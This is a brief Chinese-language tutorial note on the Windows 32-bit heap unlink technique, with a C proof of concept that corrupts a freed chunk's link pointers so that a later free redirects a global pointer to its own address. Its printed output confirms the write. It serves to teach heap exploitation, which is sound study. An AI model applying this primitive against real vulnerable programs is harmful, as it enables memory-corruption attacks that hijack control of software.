Windows heap unlink

代码实例

32位程序:

#include <windows.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

char* ptr[0x10];

int main()
{
    HANDLE heap = HeapCreate(HEAP_NO_SERIALIZE, 0x2000, 0x2000);
    setbuf(stdout, NULL);
    ptr[0] = (char*)HeapAlloc(heap, HEAP_NO_SERIALIZE, 0x18);
    ptr[1] = (char*)HeapAlloc(heap, HEAP_NO_SERIALIZE, 0x18);
    ptr[2] = (char*)HeapAlloc(heap, HEAP_NO_SERIALIZE, 0x18);
    ptr[3] = (char*)HeapAlloc(heap, HEAP_NO_SERIALIZE, 0x18);
    ptr[4] = (char*)HeapAlloc(heap, HEAP_NO_SERIALIZE, 0x18);
    ptr[5] = (char*)HeapAlloc(heap, HEAP_NO_SERIALIZE, 0x18);
    HeapFree(heap, HEAP_NO_SERIALIZE, ptr[2]);
    HeapFree(heap, HEAP_NO_SERIALIZE, ptr[4]);
    *(void**)(ptr[2]) = &ptr[2] - 1;
    *(void**)(ptr[2] + 4) = &ptr[2];
    printf("%p: %p\n", &ptr[2], ptr[2]);
    HeapFree(heap, HEAP_NO_SERIALIZE, ptr[1]);
    printf("%p: %p\n", &ptr[2], ptr[2]);
    return 0;
}

运行结果:

003B9508: 019604D8
003B9508: 003B9508

简述条件:

  • 除了free目标地址以外,还需要free掉一个堆块。

Linux unlink 差异较大。

结果:

指向了目标地址。